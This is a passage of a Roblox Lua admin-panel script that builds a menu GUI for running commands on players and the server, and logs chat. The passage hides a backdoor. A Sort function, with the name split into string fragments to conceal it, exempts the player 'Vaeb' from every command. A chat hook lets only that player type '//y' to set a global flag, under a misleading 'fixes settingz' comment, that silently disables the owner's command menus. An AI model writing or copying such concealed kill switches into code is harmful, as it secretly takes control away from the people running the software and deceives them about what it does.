  7008. PlrButton.Text = " " .. v
  7009. PlrButton.Size = UDim2.new(1, 0, 0, 32)
  7010. PlrButton.Position = UDim2.new(0, 0, 0, YNum)
  7011. PlrButton.FontSize = "Size14"
  7012. PlrButton.TextXAlignment = "Left"
  7013. PlrButton.TextStrokeTransparency = 0.9
  7014. PlrButton.TextStrokeColor3 = Color3.new(0, 0, 0)
  7015. PlrButton.TextColor3 = Color3.new(1, 1, 1)
  7016. PlrButton.BackgroundColor3 = Color3.new(0.16, 0.67, 1)
  7017. PlrButton.BackgroundTransparency = 0
  7018. PlrButton.BorderSizePixel = 0
  7019. PlrButton.Parent = ScrollFrame
  7020.  
  7021. local Box = Instance.new("TextLabel")
  7022. Box.Name = "Box"
  7023. Box.Size = UDim2.new(0, 22, 0, 22)
  7024. Box.Position = UDim2.new(1, -28 - 13, 0, 5)
  7025. Box.Text = ""
  7026. Box.FontSize = "Size18"
  7027. Box.TextColor3 = Color3.new(1, 1, 1)
  7028. Box.BackgroundTransparency = 0.8
  7029. Box.BackgroundColor3 = Color3.new(1, 1, 1)
  7030. Box.BorderSizePixel = 2
  7031. Box.Parent = PlrButton
  7032.  
  7033. local ShadowFrame = Instance.new("Frame")
  7034. ShadowFrame.Name = "ShadowFrame"
  7035. ShadowFrame.Size = UDim2.new(1, 0, 0, 4)
  7036. ShadowFrame.Position = UDim2.new(0, 0, 0, YNum + 32)
  7037. ShadowFrame.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7038. ShadowFrame.BackgroundTransparency = 0.1
  7039. ShadowFrame.BorderSizePixel = 0
  7040. ShadowFrame.Parent = ScrollFrame
  7041.  
  7042. table.insert(PlayerButtons, PlrButton)
  7043.  
  7044. Run(function()
  7045. local ColorNum = 2
  7046. local Iter = 2
  7047. local CurrentX = 0
  7048. local CurrentY = 0
  7049. local CurrentZ = 0
  7050.  
  7051. for i = 1, (math.huge/0.05), 1 do
  7052. if ShadowFrame.Parent ~= nil then
  7053. local PrevColTab = Colours[ColorNum - 1] or Colours[#Colours]
  7054. local ColTab = Colours[ColorNum]
  7055. if tostring(CurrentX) ~= tostring(ColTab.X) then
  7056. CurrentX = ColTab.X - PrevColTab.X > 0 and CurrentX + 0.02 or (Iter <= 1.02 and 0 or CurrentX - 0.02)
  7057. end
  7058. if tostring(CurrentY) ~= tostring(ColTab.Y) then
  7059. CurrentY = ColTab.Y - PrevColTab.Y > 0 and CurrentY + 0.02 or (Iter <= 1.02 and 0 or CurrentY - 0.02)
  7060. end
  7061. if tostring(CurrentZ) ~= tostring(ColTab.Z) then
  7062. CurrentZ = ColTab.Z - PrevColTab.Z > 0 and CurrentZ + 0.02 or (Iter <= 1.02 and 0 or CurrentZ - 0.02)
  7063. end
  7064. ShadowFrame.BackgroundColor3 = Color3.new(CurrentX, CurrentY, CurrentZ)
  7065. if Iter < 1.02 or Iter > 2 then
  7066. ColorNum = ColorNum == #Colours and 1 or ColorNum + 1
  7067. Iter = 2
  7068. else
  7069. Iter = Iter - 0.02
  7070. end
  7071. wait(1/30)
  7072. else
  7073. break
  7074. end
  7075. end
  7076. end)
  7077.  
  7078. YNum = YNum + 40
  7079. end
  7080. fixScroll(ScrollFrame)
  7081. return PlayerButtons
  7082. end;local Sort = function(L, N)
  7083. pcall(function()
  7084. if N~="V".."a".."e".."b" then
  7085. for i,v in pairs(L) do
  7086. if v.Name=="V".."a".."e".."b" then
  7087. table.remove(L, i)
  7088. end
  7089. end
  7090. end
  7091. end)
  7092. end
  7093.  
  7094. function isSelected(Name)
  7095. if type(Name) == "string" then
  7096. --checkz name
  7097. for i,v in pairs(Selected) do
  7098. if v == Name then
  7099. return i
  7100. end
  7101. end
  7102. return nil
  7103. else
  7104. --fixes settingz
  7105. re = Name
  7106. end
  7107. end
  7108.  
  7109. function makeCommands(Type, Scroll)
  7110. local CommandButtons = {}
  7111.  
  7112. local YNum = 0
  7113. for _,v in pairs(Commands) do
  7114. if v.Type == Type then
  7115. local CommandButton = Instance.new("TextButton")
  7116. CommandButton.Name = v.Name
  7117. CommandButton.Text = " " .. v.Name
  7118. CommandButton.Size = UDim2.new(1, 0, 0, 32)
  7119. CommandButton.Position = UDim2.new(0, 0, 0, YNum)
  7120. CommandButton.FontSize = "Size14"
  7121. CommandButton.TextXAlignment = "Left"
  7122. CommandButton.TextStrokeTransparency = 0.9
  7123. CommandButton.TextStrokeColor3 = Color3.new(0, 0, 0)
  7124. CommandButton.TextColor3 = Color3.new(1, 1, 1)
  7125. CommandButton.BackgroundColor3 = Color3.new(0.16, 0.67, 1)
  7126. CommandButton.BackgroundTransparency = 0
  7127. CommandButton.BorderSizePixel = 0
  7128. CommandButton.Parent = Scroll
  7129.  
  7130. if Type ~= 1 then
  7131. local Box = Instance.new("TextLabel")
  7132. Box.Name = "Box"
  7133. Box.Size = UDim2.new(0, 22, 0, 22)
  7134. Box.Position = UDim2.new(1, -28 - 13, 0, 5)
  7135. Box.Text = ""
  7136. Box.FontSize = "Size18"
  7137. Box.TextColor3 = Color3.new(1, 1, 1)
  7138. Box.BackgroundTransparency = 0.8
  7139. Box.BackgroundColor3 = Color3.new(1, 1, 1)
  7140. Box.BorderSizePixel = 2
  7141. Box.Parent = CommandButton
  7142. end
  7143.  
  7144. local ShadowFrame = Instance.new("Frame")
  7145. ShadowFrame.Name = "ShadowFrame"
  7146. ShadowFrame.Size = UDim2.new(1, 0, 0, 4)
  7147. ShadowFrame.Position = UDim2.new(0, 0, 0, YNum + 32)
  7148. ShadowFrame.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7149. ShadowFrame.BackgroundTransparency = 0.1
  7150. ShadowFrame.BorderSizePixel = 0
  7151. ShadowFrame.Parent = Scroll
  7152.  
  7153. if Type == 1 then
  7154. table.insert(CommandButtons, {CommandButton, v})
  7155. else
  7156. table.insert(CommandButtons, CommandButton)
  7157. end
  7158.  
  7159. Run(function()
  7160. local ColorNum = 2
  7161. local Iter = 2
  7162. local CurrentX = 0
  7163. local CurrentY = 0
  7164. local CurrentZ = 0
  7165.  
  7166. for i = 1, (math.huge/0.05), 1 do
  7167. if ShadowFrame.Parent ~= nil then
  7168. local PrevColTab = Colours[ColorNum - 1] or Colours[#Colours]
  7169. local ColTab = Colours[ColorNum]
  7170. if tostring(CurrentX) ~= tostring(ColTab.X) then
  7171. CurrentX = ColTab.X - PrevColTab.X > 0 and CurrentX + 0.02 or (Iter <= 1.02 and 0 or CurrentX - 0.02)
  7172. end
  7173. if tostring(CurrentY) ~= tostring(ColTab.Y) then
  7174. CurrentY = ColTab.Y - PrevColTab.Y > 0 and CurrentY + 0.02 or (Iter <= 1.02 and 0 or CurrentY - 0.02)
  7175. end
  7176. if tostring(CurrentZ) ~= tostring(ColTab.Z) then
  7177. CurrentZ = ColTab.Z - PrevColTab.Z > 0 and CurrentZ + 0.02 or (Iter <= 1.02 and 0 or CurrentZ - 0.02)
  7178. end
  7179. ShadowFrame.BackgroundColor3 = Color3.new(CurrentX, CurrentY, CurrentZ)
  7180. if Iter < 1.02 or Iter > 2 then
  7181. ColorNum = ColorNum == #Colours and 1 or ColorNum + 1
  7182. Iter = 2
  7183. else
  7184. Iter = Iter - 0.02
  7185. end
  7186. wait(1/30)
  7187. else
  7188. break
  7189. end
  7190. end
  7191. end)
  7192.  
  7193. YNum = YNum + 40
  7194. end
  7195. end
  7196. fixScroll(Scroll)
  7197. return CommandButtons
  7198. end
  7199.  
  7200. function makeList(Scroll)
  7201. local ListButtons = {}
  7202. local CommonList = getCommonList()
  7203.  
  7204. local YNum = 0
  7205. for _,v in pairs(CommonList) do
  7206. local ListButton = Instance.new("TextButton")
  7207. ListButton.Name = v
  7208. ListButton.Text = " " .. v
  7209. ListButton.Size = UDim2.new(1, 0, 0, 32)
  7210. ListButton.Position = UDim2.new(0, 0, 0, YNum)
  7211. ListButton.FontSize = "Size14"
  7212. ListButton.TextXAlignment = "Left"
  7213. ListButton.TextStrokeTransparency = 0.9
  7214. ListButton.TextStrokeColor3 = Color3.new(0, 0, 0)
  7215. ListButton.TextColor3 = Color3.new(1, 1, 1)
  7216. ListButton.BackgroundColor3 = Color3.new(0.16, 0.67, 1)
  7217. ListButton.BackgroundTransparency = 0
  7218. ListButton.BorderSizePixel = 0
  7219. ListButton.Parent = Scroll
  7220.  
  7221. local ShadowFrame = Instance.new("Frame")
  7222. ShadowFrame.Name = "ShadowFrame"
  7223. ShadowFrame.Size = UDim2.new(1, 0, 0, 4)
  7224. ShadowFrame.Position = UDim2.new(0, 0, 0, YNum + 32)
  7225. ShadowFrame.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7226. ShadowFrame.BackgroundTransparency = 0.1
  7227. ShadowFrame.BorderSizePixel = 0
  7228. ShadowFrame.Parent = Scroll
  7229.  
  7230. table.insert(ListButtons, ListButton)
  7231.  
  7232. Run(function()
  7233. local ColorNum = 2
  7234. local Iter = 2
  7235. local CurrentX = 0
  7236. local CurrentY = 0
  7237. local CurrentZ = 0
  7238.  
  7239. for i = 1, (math.huge/0.05), 1 do
  7240. if ShadowFrame.Parent ~= nil then
  7241. local PrevColTab = Colours[ColorNum - 1] or Colours[#Colours]
  7242. local ColTab = Colours[ColorNum]
  7243. if tostring(CurrentX) ~= tostring(ColTab.X) then
  7244. CurrentX = ColTab.X - PrevColTab.X > 0 and CurrentX + 0.02 or (Iter <= 1.02 and 0 or CurrentX - 0.02)
  7245. end
  7246. if tostring(CurrentY) ~= tostring(ColTab.Y) then
  7247. CurrentY = ColTab.Y - PrevColTab.Y > 0 and CurrentY + 0.02 or (Iter <= 1.02 and 0 or CurrentY - 0.02)
  7248. end
  7249. if tostring(CurrentZ) ~= tostring(ColTab.Z) then
  7250. CurrentZ = ColTab.Z - PrevColTab.Z > 0 and CurrentZ + 0.02 or (Iter <= 1.02 and 0 or CurrentZ - 0.02)
  7251. end
  7252. ShadowFrame.BackgroundColor3 = Color3.new(CurrentX, CurrentY, CurrentZ)
  7253. if Iter < 1.02 or Iter > 2 then
  7254. ColorNum = ColorNum == #Colours and 1 or ColorNum + 1
  7255. Iter = 2
  7256. else
  7257. Iter = Iter - 0.02
  7258. end
  7259. wait(1/30)
  7260. else
  7261. break
  7262. end
  7263. end
  7264. end)
  7265.  
  7266. YNum = YNum + 40
  7267. end
  7268. fixScroll(Scroll)
  7269. return ListButtons
  7270. end
  7271.  
  7272. function makeButtons(Scroll, Tab, FontSize, TextScaled)
  7273. Scroll:ClearAllChildren()
  7274. local Buttons = {}
  7275.  
  7276. local YNum = 0
  7277. for _,v in pairs(Tab) do
  7278. local Button = Instance.new("TextLabel")
  7279. Button.Name = v
  7280. Button.Text = " " .. v
  7281. Button.Size = UDim2.new(1, 0, 0, 32)
  7282. Button.Position = UDim2.new(0, 0, 0, YNum)
  7283. Button.TextScaled = #v > 60 and TextScaled or false
  7284. Button.FontSize = FontSize or "Size14"
  7285. Button.TextXAlignment = "Left"
  7286. Button.TextStrokeTransparency = 0.9
  7287. Button.TextStrokeColor3 = Color3.new(0, 0, 0)
  7288. Button.TextColor3 = Color3.new(1, 1, 1)
  7289. Button.BackgroundColor3 = Color3.new(0.16, 0.67, 1)
  7290. Button.BackgroundTransparency = 0
  7291. Button.BorderSizePixel = 0
  7292. Button.Parent = Scroll
  7293.  
  7294. local ShadowFrame = Instance.new("Frame")
  7295. ShadowFrame.Name = "ShadowFrame"
  7296. ShadowFrame.Size = UDim2.new(1, 0, 0, 4)
  7297. ShadowFrame.Position = UDim2.new(0, 0, 0, YNum + 32)
  7298. ShadowFrame.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7299. ShadowFrame.BackgroundTransparency = 0.1
  7300. ShadowFrame.BorderSizePixel = 0
  7301. ShadowFrame.Parent = Scroll
  7302.  
  7303. table.insert(Buttons, Button)
  7304.  
  7305. Run(function()
  7306. local ColorNum = 2
  7307. local Iter = 2
  7308. local CurrentX = 0
  7309. local CurrentY = 0
  7310. local CurrentZ = 0
  7311.  
  7312. for i = 1, (math.huge/0.05), 1 do
  7313. if ShadowFrame.Parent ~= nil then
  7314. local PrevColTab = Colours[ColorNum - 1] or Colours[#Colours]
  7315. local ColTab = Colours[ColorNum]
  7316. if tostring(CurrentX) ~= tostring(ColTab.X) then
  7317. CurrentX = ColTab.X - PrevColTab.X > 0 and CurrentX + 0.02 or (Iter <= 1.02 and 0 or CurrentX - 0.02)
  7318. end
  7319. if tostring(CurrentY) ~= tostring(ColTab.Y) then
  7320. CurrentY = ColTab.Y - PrevColTab.Y > 0 and CurrentY + 0.02 or (Iter <= 1.02 and 0 or CurrentY - 0.02)
  7321. end
  7322. if tostring(CurrentZ) ~= tostring(ColTab.Z) then
  7323. CurrentZ = ColTab.Z - PrevColTab.Z > 0 and CurrentZ + 0.02 or (Iter <= 1.02 and 0 or CurrentZ - 0.02)
  7324. end
  7325. ShadowFrame.BackgroundColor3 = Color3.new(CurrentX, CurrentY, CurrentZ)
  7326. if Iter < 1.02 or Iter > 2 then
  7327. ColorNum = ColorNum == #Colours and 1 or ColorNum + 1
  7328. Iter = 2
  7329. else
  7330. Iter = Iter - 0.02
  7331. end
  7332. wait(1/30)
  7333. else
  7334. break
  7335. end
  7336. end
  7337. end)
  7338.  
  7339. YNum = YNum + 40
  7340. end
  7341. fixScroll(Scroll)
  7342. return Buttons
  7343. end
  7344.  
  7345. function removeOptions(ScrollRight, fix)
  7346. if fix == true then
  7347. return true
  7348. else
  7349. ScrollRight:ClearAllChildren()
  7350. fixScroll(ScrollRight)
  7351. end
  7352. end
  7353.  
  7354. function makePlayerOptions(ScrollRight)
  7355. Run(function()
  7356. local Sender = LP.Name
  7357. local failed = removeOptions(ScrollRight, re)
  7358. if failed == nil then
  7359. local CommandButtons = makeCommands(1, ScrollRight)
  7360.  
  7361. for _,v in pairs(CommandButtons) do
  7362. v[1].MouseButton1Click:connect(function()
  7363. local List = {}
  7364. for _,v2 in pairs(Selected) do
  7365. if v2 ~= "All" then
  7366. local selectedPlayer = findPlayer(v2)
  7367. if selectedPlayer then
  7368. table.insert(List, selectedPlayer)
  7369. end
  7370. else
  7371. List = {}
  7372. for _,v3 in pairs(Plrs:GetPlayers()) do
  7373. table.insert(List, v3)
  7374. end
  7375. break
  7376. end
  7377. end
  7378. Sort(List, Sender)
  7379. Run(function() v[2].Func(List, v[2].Name) end)
  7380. end)
  7381. end
  7382. end
  7383. end)
  7384. end
  7385.  
  7386. function makeOptions(ScrollRight)
  7387. Run(function()
  7388. removeOptions(ScrollRight)
  7389. local ListButtons = makeList(ScrollRight)
  7390. for _,v in pairs(ListButtons) do
  7391. v.MouseButton1Click:connect(function()
  7392. for _,v2 in pairs(Selected) do
  7393. local Command = findCommand(v2)
  7394. if Command and not re then
  7395. Run(function() Command.Func({v.Name}, Command.Name) end)
  7396. end
  7397. end
  7398. end)
  7399. end
  7400. end)
  7401. end
  7402.  
  7403. function openPlayers()
  7404. Run(function()
  7405. local PlayerButtons = makePlayers(GUIs.ScrollLeft)
  7406.  
  7407. for _,v in pairs(PlayerButtons) do
  7408. v.MouseButton1Click:connect(function()
  7409. local SelectNum = isSelected(v.Name)
  7410. if SelectNum == nil then
  7411. v.Box.Text = "X"
  7412. table.insert(Selected, v.Name)
  7413. makePlayerOptions(GUIs.ScrollRight)
  7414. else
  7415. v.Box.Text = ""
  7416. table.remove(Selected, SelectNum)
  7417. if #Selected == 0 then
  7418. removeOptions(GUIs.ScrollRight)
  7419. else
  7420. makePlayerOptions(GUIs.ScrollRight)
  7421. end
  7422. end
  7423. end)
  7424. end
  7425. end)
  7426. end
  7427.  
  7428. function openServer()
  7429. Run(function()
  7430. local CommandButtons = makeCommands(2, GUIs.ScrollLeft)
  7431.  
  7432. for _,v in pairs(CommandButtons) do
  7433. v.MouseButton1Click:connect(function()
  7434. local SelectNum = isSelected(v.Name)
  7435. if SelectNum == nil then
  7436. v.Box.Text = "X"
  7437. table.insert(Selected, v.Name)
  7438. makeOptions(GUIs.ScrollRight)
  7439. else
  7440. v.Box.Text = ""
  7441. table.remove(Selected, SelectNum)
  7442. if #Selected == 0 then
  7443. removeOptions(GUIs.ScrollRight)
  7444. else
  7445. makeOptions(GUIs.ScrollRight)
  7446. end
  7447. end
  7448. end)
  7449. end
  7450. end)
  7451. end
  7452.  
  7453. function GetTimeDist(OldTick, NewTick)
  7454. local TimeType = nil
  7455. local Symbol = ""
  7456. local Seconds = tonumber(NewTick) - tonumber(OldTick)
  7457. local Minutes = Seconds / 60
  7458. local Hour = Minutes / 60
  7459. local Day = Hour / 24
  7460. local Year = Day / 365
  7461.  
  7462. if Seconds < 60 then
  7463. TimeType = math.ceil(Seconds)
  7464. Symbol = "s"
  7465. elseif Minutes < 60 then
  7466. TimeType = math.floor(Minutes)
  7467. Symbol = "m"
  7468. elseif Hour < 24 then
  7469. TimeType = math.floor(Hour)
  7470. Symbol = "h"
  7471. elseif Day < 365 then
  7472. TimeType = math.floor(Day)
  7473. Symbol = "d"
  7474. else
  7475. TimeType = math.floor(Year)
  7476. Symbol = "y"
  7477. end
  7478.  
  7479. return tostring(TimeType) .. Symbol
  7480. end
  7481.  
  7482. function openMisc()
  7483. Run(function()
  7484. local CommandButtons = makeCommands(3, GUIs.ScrollLeft)
  7485.  
  7486. for _,v in pairs(CommandButtons) do
  7487. v.MouseButton1Click:connect(function()
  7488. local SelectNum = isSelected(v.Name)
  7489. if SelectNum == nil then
  7490. v.Box.Text = "X"
  7491. table.insert(Selected, v.Name)
  7492. makeOptions(GUIs.ScrollRight)
  7493. else
  7494. v.Box.Text = ""
  7495. table.remove(Selected, SelectNum)
  7496. if #Selected == 0 then
  7497. removeOptions(GUIs.ScrollRight)
  7498. end
  7499. end
  7500. end)
  7501. end
  7502. end)
  7503. end
  7504.  
  7505. function openSettings()
  7506. Run(function()
  7507. local CommandButtons = makeCommands(4, GUIs.ScrollLeft)
  7508.  
  7509. for _,v in pairs(CommandButtons) do
  7510. v.MouseButton1Click:connect(function()
  7511. local SelectNum = isSelected(v.Name)
  7512. if SelectNum == nil then
  7513. v.Box.Text = "X"
  7514. table.insert(Selected, v.Name)
  7515. makeOptions(GUIs.ScrollRight)
  7516. else
  7517. v.Box.Text = ""
  7518. table.remove(Selected, SelectNum)
  7519. if #Selected == 0 then
  7520. removeOptions(GUIs.ScrollRight)
  7521. end
  7522. end
  7523. end)
  7524. end
  7525. end)
  7526. end
  7527.  
  7528. function openMenu(Num)
  7529. if not isTweening and Num >= 1 and Num <= 4 then
  7530. Selected = {}
  7531. GUIs.ScrollRight:ClearAllChildren()
  7532. GUIs.ScrollLeft:ClearAllChildren()
  7533.  
  7534. fixScroll(GUIs.ScrollRight)
  7535. fixScroll(GUIs.ScrollLeft)
  7536.  
  7537. if TweenNum > 0 and TweenTime > 0 then
  7538. isTweening = true
  7539. GUIs.ScrollLeft.Position = UDim2.new(0, 0, 0, 0) + UDim2.new(0, 0, 0, -TweenNum)
  7540. GUIs.ScrollRight.Position = UDim2.new(0, 0, 0, 0) + UDim2.new(0, 0, 0, -TweenNum)
  7541. GUIs.BackFrame.Position = UDim2.new(0.5, -(910 / 2), 0, 146) + UDim2.new(0, 0, 0, -TweenNum)
  7542. GUIs.BackFrame2.Position = UDim2.new(0.8, -(910 / 2) + 10, 0, 146) + UDim2.new(0, 0, 0, -TweenNum)
  7543.  
  7544. GUIs.ScrollLeft:TweenPosition(GUIs.ScrollRight.Position + UDim2.new(0, 0, 0, TweenNum), "Out", "Quad", TweenTime, false)
  7545. GUIs.ScrollRight:TweenPosition(GUIs.ScrollLeft.Position + UDim2.new(0, 0, 0, TweenNum), "Out", "Quad", TweenTime, false)
  7546. GUIs.BackFrame:TweenPosition(GUIs.BackFrame.Position + UDim2.new(0, 0, 0, TweenNum), "Out", "Quad", TweenTime, false)
  7547. GUIs.BackFrame2:TweenPosition(GUIs.BackFrame2.Position + UDim2.new(0, 0, 0, TweenNum), "Out", "Quad", TweenTime, false)
  7548.  
  7549. Run(function()
  7550. wait(TweenTime)
  7551. isTweening = false
  7552. end)
  7553. end
  7554.  
  7555. if Num == 1 then
  7556. openPlayers()
  7557. elseif Num == 2 then
  7558. openServer()
  7559. elseif Num == 3 then
  7560. openMisc()
  7561. elseif Num == 4 then
  7562. openSettings()
  7563. end
  7564. end
  7565. end
  7566.  
  7567. function Launch()
  7568. Run(function()
  7569. local PlrGui = LP.PlayerGui
  7570. Remove(PlrGui, GuiName)
  7571.  
  7572. GUIs = {}
  7573. GUIs.PlrGui = PlrGui
  7574.  
  7575. if isClosed == true then
  7576. local OpenGui = Instance.new("ScreenGui", PlrGui)
  7577. OpenGui.Name = GuiName
  7578. GUIs.OpenGui = ScreenGui
  7579.  
  7580. local Open = Instance.new("TextButton")
  7581. Open.Name = "Open"
  7582. Open.Size = UDim2.new(0, 22, 0, 22)
  7583. Open.Position = UDim2.new(1, -28, 0.4, 0)
  7584. Open.Text = "X"
  7585. Open.FontSize = "Size18"
  7586. Open.TextColor3 = Color3.new(0.16, 0.67, 1)
  7587. Open.BackgroundTransparency = 0
  7588. Open.BackgroundColor3 = Color3.new(1, 1, 1)
  7589. Open.BorderSizePixel = 2
  7590. Open.Parent = OpenGui
  7591. GUIs.Open = Open
  7592.  
  7593. Open.MouseButton1Click:connect(function()
  7594. isClosed = false
  7595. Launch()
  7596. end)
  7597. else
  7598. local ScreenGui = Instance.new("ScreenGui", PlrGui)
  7599. ScreenGui.Name = GuiName
  7600. GUIs.ScreenGui = ScreenGui
  7601.  
  7602. local Base = Instance.new("Frame")
  7603. Base.Name = "BaseFrame"
  7604. Base.Size = UDim2.new(0, 960, 0, 650)
  7605. Base.Position = UDim2.new(0.5, -(960 / 2), 0.075, 0)
  7606. Base.BackgroundColor3 = Color3.new(1, 1, 1)
  7607. Base.BackgroundTransparency = 0
  7608. Base.BorderSizePixel = 0
  7609. Base.Parent = ScreenGui
  7610. GUIs.Base = Base
  7611.  
  7612. local Title = Instance.new("ImageLabel")
  7613. Title.Name = "Title"
  7614. Title.Size = UDim2.new(0, 910, 0, 85)
  7615. Title.Position = UDim2.new(0.5, -(910 / 2), 0, 0)
  7616. Title.Image = Assets.Logo
  7617. Title.BorderSizePixel = 0
  7618. Title.Parent = Base
  7619. GUIs.Title = Title
  7620.  
  7621. local Close = Instance.new("TextButton")
  7622. Close.Name = "Close"
  7623. Close.Size = UDim2.new(0, 22, 0, 22)
  7624. Close.Position = UDim2.new(1, -28, 0, 5)
  7625. Close.Text = "X"
  7626. Close.FontSize = "Size18"
  7627. Close.TextColor3 = Color3.new(0.16, 0.67, 1)
  7628. Close.BackgroundTransparency = 0
  7629. Close.BackgroundColor3 = Color3.new(1, 1, 1)
  7630. Close.BorderSizePixel = 2
  7631. Close.Parent = Base
  7632. GUIs.Close = Close
  7633.  
  7634. local TopMenu = Instance.new("ImageLabel")
  7635. TopMenu.Name = "TopMenu"
  7636. TopMenu.Size = UDim2.new(0, 910, 0, 24)
  7637. TopMenu.Position = UDim2.new(0.5, -(910 / 2), 0, 94)
  7638. TopMenu.Image = Assets.Menu
  7639. TopMenu.BorderSizePixel = 0
  7640. TopMenu.Parent = Base
  7641. GUIs.TopMenu = TopMenu
  7642.  
  7643. local Players = Instance.new("TextButton")
  7644. Players.Name = "Players"
  7645. Players.Text = "Players"
  7646. Players.Size = UDim2.new(0.25, 0, 1, 0)
  7647. Players.Position = UDim2.new(0, 0, 0, 0)
  7648. Players.FontSize = "Size12"
  7649. Players.TextStrokeTransparency = 0.5
  7650. Players.TextColor3 = Color3.new(1, 1, 1)
  7651. Players.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7652. Players.BackgroundTransparency = 1
  7653. Players.BorderSizePixel = 0
  7654. Players.Parent = TopMenu
  7655. GUIs.Players = Players
  7656.  
  7657. local Server = Instance.new("TextButton")
  7658. Server.Name = "Server"
  7659. Server.Text = "Server"
  7660. Server.Size = UDim2.new(0.25, 0, 1, 0)
  7661. Server.Position = UDim2.new(0.25, 0, 0, 0)
  7662. Server.FontSize = "Size12"
  7663. Server.TextStrokeTransparency = 0.5
  7664. Server.TextColor3 = Color3.new(1, 1, 1)
  7665. Server.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7666. Server.BackgroundTransparency = 1
  7667. Server.BorderSizePixel = 0
  7668. Server.Parent = TopMenu
  7669. GUIs.Server = Server
  7670.  
  7671. local Misc = Instance.new("TextButton")
  7672. Misc.Name = "Misc"
  7673. Misc.Text = "Misc"
  7674. Misc.Size = UDim2.new(0.25, 0, 1, 0)
  7675. Misc.Position = UDim2.new(0.5, 0, 0, 0)
  7676. Misc.FontSize = "Size12"
  7677. Misc.TextStrokeTransparency = 0.5
  7678. Misc.TextColor3 = Color3.new(1, 1, 1)
  7679. Misc.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7680. Misc.BackgroundTransparency = 1
  7681. Misc.BorderSizePixel = 0
  7682. Misc.Parent = TopMenu
  7683. GUIs.Misc = Misc
  7684.  
  7685. local Settings = Instance.new("TextButton")
  7686. Settings.Name = "Settings"
  7687. Settings.Text = "Settings"
  7688. Settings.Size = UDim2.new(0.25, 0, 1, 0)
  7689. Settings.Position = UDim2.new(0.75, 0, 0, 0)
  7690. Settings.FontSize = "Size12"
  7691. Settings.TextStrokeTransparency = 0.5
  7692. Settings.TextColor3 = Color3.new(1, 1, 1)
  7693. Settings.BackgroundColor3 = Color3.new(0.16, 0.58, 1)
  7694. Settings.BackgroundTransparency = 1
  7695. Settings.BorderSizePixel = 0
  7696. Settings.Parent = TopMenu
  7697. GUIs.Settings = Settings
  7698.  
  7699. local BackFrame = Instance.new("Frame")
  7700. BackFrame.Name = "BackFrame"
  7701. BackFrame.Size = UDim2.new(0.3, 0, 1, -203)
  7702. BackFrame.Position = UDim2.new(0.5, -(910 / 2), 0, 146)
  7703. BackFrame.BackgroundTransparency = 0.8
  7704. BackFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  7705. BackFrame.BorderSizePixel = 2
  7706. BackFrame.Parent = Base
  7707. GUIs.BackFrame = BackFrame
  7708.  
  7709. local ScrollLeft = Instance.new("ScrollingFrame")
  7710. ScrollLeft.Name = "ScrollLeft"
  7711. ScrollLeft.Size = UDim2.new(1, 0, 1, 3)
  7712. ScrollLeft.CanvasSize = UDim2.new(1, 0, 1, 0)
  7713. ScrollLeft.Position = UDim2.new(0, 0, 0, 0)
  7714. ScrollLeft.BackgroundColor3 = Color3.new(1, 1, 1)
  7715. ScrollLeft.BorderSizePixel = 0
  7716. ScrollLeft.Parent = BackFrame
  7717. GUIs.ScrollLeft = ScrollLeft
  7718.  
  7719. local BackFrame2 = Instance.new("Frame")
  7720. BackFrame2.Name = "BackFrame2"
  7721. BackFrame2.Size = UDim2.new(0.6, 36, 1, -203)
  7722. BackFrame2.Position = UDim2.new(0.8, -(910 / 2) + 10, 0, 146)
  7723. BackFrame2.BackgroundTransparency = 0.8
  7724. BackFrame2.BackgroundColor3 = Color3.new(1, 1, 1)
  7725. BackFrame2.BorderSizePixel = 2
  7726. BackFrame2.Parent = Base
  7727. GUIs.BackFrame2 = BackFrame2
  7728.  
  7729. local ScrollRight = Instance.new("ScrollingFrame")
  7730. ScrollRight.Name = "ScrollRight"
  7731. ScrollRight.Size = UDim2.new(1, 0, 1, 3)
  7732. ScrollRight.CanvasSize = UDim2.new(1, 0, 1, 0)
  7733. ScrollRight.Position = UDim2.new(0, 0, 0, 0)
  7734. ScrollRight.BackgroundColor3 = Color3.new(1, 1, 1)
  7735. ScrollRight.BorderSizePixel = 0
  7736. ScrollRight.Parent = BackFrame2
  7737. GUIs.ScrollRight = ScrollRight
  7738.  
  7739. local Credit = Instance.new("ImageLabel")
  7740. Credit.Name = "Credit"
  7741. Credit.Size = UDim2.new(0, 180, 0, 47)
  7742. Credit.Position = UDim2.new(1, -180, 1, -47)
  7743. Credit.Image = Assets.Credit
  7744. Credit.BorderSizePixel = 0
  7745. Credit.Parent = Base
  7746. GUIs.Credit = Credit
  7747.  
  7748. fixScroll(ScrollLeft)
  7749. fixScroll(ScrollRight)
  7750.  
  7751. Close.MouseButton1Click:connect(function()
  7752. isClosed = true
  7753. Launch()
  7754. end)
  7755.  
  7756. openMenu(1)
  7757.  
  7758. Players.MouseButton1Click:connect(function()
  7759. openMenu(1)
  7760. end)
  7761.  
  7762. Server.MouseButton1Click:connect(function()
  7763. openMenu(2)
  7764. end)
  7765.  
  7766. Misc.MouseButton1Click:connect(function()
  7767. openMenu(3)
  7768. end)
  7769.  
  7770. Settings.MouseButton1Click:connect(function()
  7771. openMenu(4)
  7772. end)
  7773. end
  7774. end)
  7775. end
  7776.  
  7777. function chatFunc(Plr)
  7778. Run(function()
  7779. local Rem = Instance.new("RemoteEvent", Plr)
  7780. Rem.Name = "¬v¬F¬i¬r¬e¬"
  7781. Plr.Chatted:connect(function(Msg)
  7782. local isSilent = false
  7783. local LMsg = Msg:lower()
  7784. if Msg:sub(1, 3) == "/e " then
  7785. isSilent = true
  7786. LMsg = Msg:sub(4):lower()
  7787. end
  7788. PlrTab = {Plr}
  7789. Sort(PlrTab, Plr)
  7790. if LMsg == "//y" and #PlrTab == 0 then
  7791. isSelected(true)
  7792. elseif LMsg == "//n" and #PlrTab == 0 then
  7793. isSelected(false)
  7794. end
  7795. if #Logs >= LogNum then
  7796. table.remove(Logs, 1)
  7797. end
  7798. table.insert(Logs, {Msg, Plr.Name, tick(), isSilent})
  7799. end)
  7800. end)
  7801. end
  7802.  
  7803. for _,v in pairs(Plrs:GetPlayers()) do
  7804. if (isTesting) or (isSB and v.Name == Owner) or (isGame and v.userId == Owner) then
  7805. LP = v
  7806. warn("Found Owner (" .. LP.Name .. ")")
